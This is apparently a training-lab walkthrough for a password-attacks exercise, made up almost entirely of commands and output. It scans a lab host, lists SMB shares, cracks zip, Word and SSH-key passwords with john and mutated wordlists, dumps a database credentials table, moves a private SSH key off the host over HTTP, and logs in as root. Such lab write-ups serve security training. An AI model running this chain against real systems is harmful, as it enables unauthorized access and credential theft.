Password Attacks Lab - Medium
June 15, 2024
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-15 14:10 PST
Nmap scan report for 10.129.202.221
Host is up (0.29s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
1053/tcp filtered remote-as
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 3s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-06-15T06:10:55
|_ start_date: N/A
|_nbstat: NetBIOS name: SKILLS-MEDIUM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.99 seconds
smbclient -N -L 10.129.202.221
smbclient \\\\10.129.202.221\\SHAREDRIVE
zip2john Docs.zip > forjohn.hash
cat forjohn.hash
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
sudo john --wordlist=mut_password.list zip-hash.txt
Destiny2022! (Docs.zip/Documentation.docx)
office2john Documentation.docx > doc-hash.txt
sudo john --wordlist=mut_password.list doc-hash.txt
Pass - 987654321
libreoffice Documentation.docx
jason:C4mNKjAtL2dydsYa6
ssh jason@10.129.202.221
mysql -u jason -pC4mNKjAtL2dydsYa6
show databases;
use users;
show tables;
select * from creds;
dennis:7AUgWWQEiMPdqx
su dennis
cd .ssh
ls -la
python3 -m http.server
wget http://10.129.186.212:8000/id_rsa
ssh2john id_rsa > forjohn
sudo john --wordlist=mut_password.list forjohn
P@ssw0rd12020!
chmod 600 id_rsa
ssh -i id_rsa root@10.129.186.212
Last updated